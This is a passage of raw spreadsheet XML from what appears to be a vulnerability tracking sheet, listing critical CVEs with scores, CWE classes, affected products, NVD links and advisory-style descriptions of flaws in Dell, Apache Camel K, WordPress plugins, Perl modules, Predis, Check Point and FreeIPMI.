        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79941</t>
        </is>
      </c>
      <c r="C265" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D265" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E265" s="5" t="inlineStr"/>
      <c r="F265" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I265" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L265"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M265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79941</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80129</t>
        </is>
      </c>
      <c r="C266" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D266" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E266" s="5" t="inlineStr"/>
      <c r="F266" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I266" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L266"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M266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80129</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80131</t>
        </is>
      </c>
      <c r="C267" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D267" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E267" s="5" t="inlineStr"/>
      <c r="F267" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I267" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L267"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M267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80131</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80172</t>
        </is>
      </c>
      <c r="C268" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D268" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E268" s="5" t="inlineStr"/>
      <c r="F268" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I268" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L268" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insufficient Verification of Data Authenticity vulnerability. An unauthenticated attacker with remote access could exploit this, leading to unauthorized access. This vulnerability is considered critical as an unauthenticated attacker can repeatedly reuse a captured request to generate ADMIN access and refresh tokens. Since there is no nonce validation or time limit on requests, the attack can be performed indefinitely. Dell recommends customers to upgrade at the earliest opportunity</t>
        </is>
      </c>
      <c r="M268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80172</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80351</t>
        </is>
      </c>
      <c r="C269" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D269" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E269" s="5" t="inlineStr"/>
      <c r="F269" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G269" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L269" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of directives in dynamically evaluated code ('eval injection') vulnerability in Apache Camel K.
An improper neutralization of directives in dynamically evaluated Maven configuration allows tenant-controlled repository content to influence code execution within the operator pod, potentially enabling tenants to execute arbitrary code with the privileges of the operator.
This issue affects Apache Camel K: from 2.0.0 before 2.9.3, from 2.10.1 before 2.10.2.
Users are recommended to upgrade to version 2.9.3, 2.10.2 or 2.11.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80351</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80352</t>
        </is>
      </c>
      <c r="C270" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D270" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E270" s="5" t="inlineStr"/>
      <c r="F270" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G270" s="5" t="inlineStr">
        <is>
          <t>apache, kubernetes</t>
        </is>
      </c>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L270" s="5" t="inlineStr">
        <is>
          <t>Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Camel K.
A YAML injection vulnerability in custom resource configuration allows an authorized CR author to inject arbitrary Kubernetes objects, potentially enabling unauthorized resource creation with the privileges of the operator.
This issue affects Apache Camel K: from 2.0.0 before 2.9.3, from 2.10.1 before 2.10.2.
Users are recommended to upgrade to version 2.9.3, 2.10.2 or 2.11.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80352</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81204</t>
        </is>
      </c>
      <c r="C271" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D271" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E271" s="5" t="inlineStr"/>
      <c r="F271" s="5" t="inlineStr"/>
      <c r="G271" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L271" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to execute arbitrary code due to code injection during graph construction.</t>
        </is>
      </c>
      <c r="M271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81204</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81467</t>
        </is>
      </c>
      <c r="C272" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D272" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E272" s="5" t="inlineStr"/>
      <c r="F272" s="5" t="inlineStr"/>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L272" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10. 2616, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Command execution.</t>
        </is>
      </c>
      <c r="M272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81467</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82923</t>
        </is>
      </c>
      <c r="C273" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D273" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E273" s="5" t="inlineStr"/>
      <c r="F273" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L273" s="5" t="inlineStr">
        <is>
          <t>The AI Website Builder WordPress plugin (GitHub build) 1.0.0 does not perform any authorisation or nonce check on its REST API routes, allowing unauthenticated attackers to install and activate plugins and themes, import content from a URL under their control, write a file of their choosing into the uploads directory, and delete site content and media. On a host that serves PHP from the uploads directory, that file write is remote code execution.</t>
        </is>
      </c>
      <c r="M273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82923</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83627</t>
        </is>
      </c>
      <c r="C274" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D274" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E274" s="5" t="inlineStr"/>
      <c r="F274" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L274" s="5" t="inlineStr">
        <is>
          <t>The Hummingbird – Speed Optimization, Caching, Minify, Compress &amp; CDN plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.21.0 via the log_msg() function in core/modules/class-page-cache.php. The page-cache debug log is written to wp-content/wphb-logs/page-caching-log.php, a directly web-accessible PHP file that is supposed to be protected by a leading '&lt;?php die(); ?&gt;' header. That header is guarded by class_exists( 'Filesystem' ), which can never match because class_exists() resolves string arguments in the global namespace while the class is Hummingbird\Core\Filesystem; when the log is created during a front-end request the header is therefore omitted entirely. get_cookies() then writes the raw name of any cookie matching the wphb_cache_ prefix into that file without sanitization. This makes it possible for unauthenticated attackers to write arbitrary PHP into the log file with a single anonymous request and execute it by requesting the file directly, resulting in full remote code execution. Exploitation requires the site administrator to have enabled Page Caching with the Debug Log option (non-default), and the log file to be created during a front-end request — a state reached by the plugin's own 'Clear logs' action, any cache flush, or unattended via the plugin's daily log-rotation cron, which can strip the protective header from an existing log file.</t>
        </is>
      </c>
      <c r="M274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83627</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8376</t>
        </is>
      </c>
      <c r="C275" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D275" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E275" s="5" t="inlineStr"/>
      <c r="F275" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr">
        <is>
          <t>perl:perl</t>
        </is>
      </c>
      <c r="I275" s="5" t="inlineStr">
        <is>
          <t>2026-05-26</t>
        </is>
      </c>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr">
        <is>
          <t>CWE-680</t>
        </is>
      </c>
      <c r="L275" s="5" t="inlineStr">
        <is>
          <t>Perl versions before 5.40.5-RC1, from 5.41.0 before 5.42.3-RC1, from 5.43.0 before 5.43.11 have a heap buffer overflow when compiling regular expressions with a repeated fixed string on 32-bit builds.
Perl_study_chunk in regcomp_study.c checked the size of the joined substring buffer in characters rather than bytes. For a quantified fixed substring with a large minimum count, the byte length mincount * l could overflow SSize_t, producing an undersized SvGROW allocation; the subsequent copy writes past the end of the buffer.
A caller that compiles an attacker-controlled regular expression on a 32-bit perl build triggers a heap buffer overflow at compile time.</t>
        </is>
      </c>
      <c r="M275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8376</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84372</t>
        </is>
      </c>
      <c r="C276" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D276" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E276" s="5" t="inlineStr"/>
      <c r="F276" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G276" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L276" s="5" t="inlineStr">
        <is>
          <t>Predis is a flexible and feature-complete Redis and Valkey client for PHP. From version 3.0.0-RC1 until version 3.3.0, pipeline handling on aggregate cluster and replication connections reparses an already serialized RESP buffer in AbstractAggregateConnection::write() by splitting it with explode("\r\n") instead of honoring RESP length prefixes. Attacker-controlled keys or values containing CRLF sequences can therefore be interpreted by Command::deserializeCommand() as additional commands. On cluster connections, ClusterStrategy::getFakeKey() can route injected keyless commands using the literal fake key value "key", permitting operations such as shard-wide cache deletion, targeted data modification, data reads, or node disruption. On replication connections, malformed reparsing can throw an uncaught exception and repeatedly terminate affected requests. Only pipeline() reaches this vulnerable path; transaction() and MULTI are not affected. This issue is fixed in version 3.3.0.</t>
        </is>
      </c>
      <c r="M276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84372</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85025</t>
        </is>
      </c>
      <c r="C277" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D277" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E277" s="5" t="inlineStr"/>
      <c r="F277" s="5" t="inlineStr"/>
      <c r="G277" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L277"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M277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85025</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85102</t>
        </is>
      </c>
      <c r="C278" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D278" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E278" s="5" t="inlineStr"/>
      <c r="F278" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L278" s="5" t="inlineStr">
        <is>
          <t>Improper certificate trust validation during VPN negotiation in Check Point Quantum Security Gateway may allow an unauthenticated remote attacker to execute arbitrary code on the Gateway.</t>
        </is>
      </c>
      <c r="M278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85102</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85103</t>
        </is>
      </c>
      <c r="C279" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D279" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E279" s="5" t="inlineStr"/>
      <c r="F279" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L279" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow in VPN certificate ASN.1 decoding may allow an unauthenticated remote attacker to execute arbitrary code on Check Point Quantum Security Management and Quantum Security Gateway systems.</t>
        </is>
      </c>
      <c r="M279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85103</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85504</t>
        </is>
      </c>
      <c r="C280" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D280" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E280" s="5" t="inlineStr"/>
      <c r="F280" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L280" s="5" t="inlineStr">
        <is>
          <t>FreeIPMI before 1.6.19 has a stack-based buffer overflow in _ipmi_sel_oem_fujitsu_get_sel_entry_long_text in libfreeipmi/sel/ipmi-sel-string-fujitsu-irmc-common.c via malformed Fujitsu SEL long-text responses.</t>
        </is>
      </c>
      <c r="M280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85504</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85506</t>
        </is>
      </c>
      <c r="C281" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D281" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E281" s="5" t="inlineStr"/>
      <c r="F281" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L281" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer overflow in _get_dell_system_info_idrac_info in ipmi-oem/ipmi-oem-dell.c (idrac-info subcommand to dell get-system-info).</t>
        </is>
      </c>
      <c r="M281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85506</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85507</t>
        </is>
      </c>
      <c r="C282" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D282" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E282" s="5" t="inlineStr"/>
      <c r="F282" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L282" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer overflow in _output_dell_system_info_cmc_info in ipmi-oem/ipmi-oem-dell.c (cmc-info subcommand to dell get-system-info).</t>
        </is>
      </c>
      <c r="M282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85507</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85508</t>
        </is>
      </c>
      <c r="C283" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D283" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E283" s="5" t="inlineStr"/>
      <c r="F283" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L283" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer overflow in _output_dell_system_info_cmc_ipv6_info in ipmi-oem/ipmi-oem-dell.c (cmc-ipv6-info subcommand to dell get-system-info).</t>
        </is>
      </c>
      <c r="M283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85508</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85509</t>
        </is>
      </c>
      <c r="C284" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D284" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E284" s="5" t="inlineStr"/>
      <c r="F284" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L284" s="5" t="inlineStr">
        <is>
          <t>FreeIPMI before 1.6.19 has a stack-based buffer overflow in _read_fru_data in libfreeipmi/fru/ipmi-fru.c when a BMC returns more bytes than requested.</t>
        </is>
      </c>
      <c r="M284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85509</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86219</t>
        </is>
      </c>
      <c r="C285" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D285" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E285" s="5" t="inlineStr"/>
      <c r="F285" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L285" s="5" t="inlineStr">
        <is>
          <t>Authen::SASL::Perl::DIGEST_MD5 versions before 2.2100 for Perl accept replayed authentication responses via unverified nonce in server_step.
server_start generates a fresh nonce and sends it in the challenge, and nothing later compares that value against the nonce the client returns. server_step derives the expected digest from the client's own parameters, so a response verifies whenever its digest matches the nonce it carries. The count table it also checks is keyed on the client-supplied nonce and starts empty in each new server object, so a captured first response, carrying `nc=00000001`, passes that too. RFC 2831 defines the nonce in the response as the value the server sent in the preceding challenge.
An attacker who observes one successful `qop=auth` exchange can replay the captured response against a later session for the same service, host, realm and user, and authenticate as that user without knowing the password.</t>
        </is>
      </c>
      <c r="M285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86219</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86304</t>
        </is>
      </c>
      <c r="C286" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D286" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E286" s="5" t="inlineStr"/>
      <c r="F286" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J286" s="5" t="inlineStr"/>
      <c r="K286" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L286" s="5" t="inlineStr">
        <is>
          <t>MojoX::Authentication versions before 0.006 for Perl allow SAML authentication bypass because parse_assertion builds Net::SAML2::Binding::POST without a trust anchor.
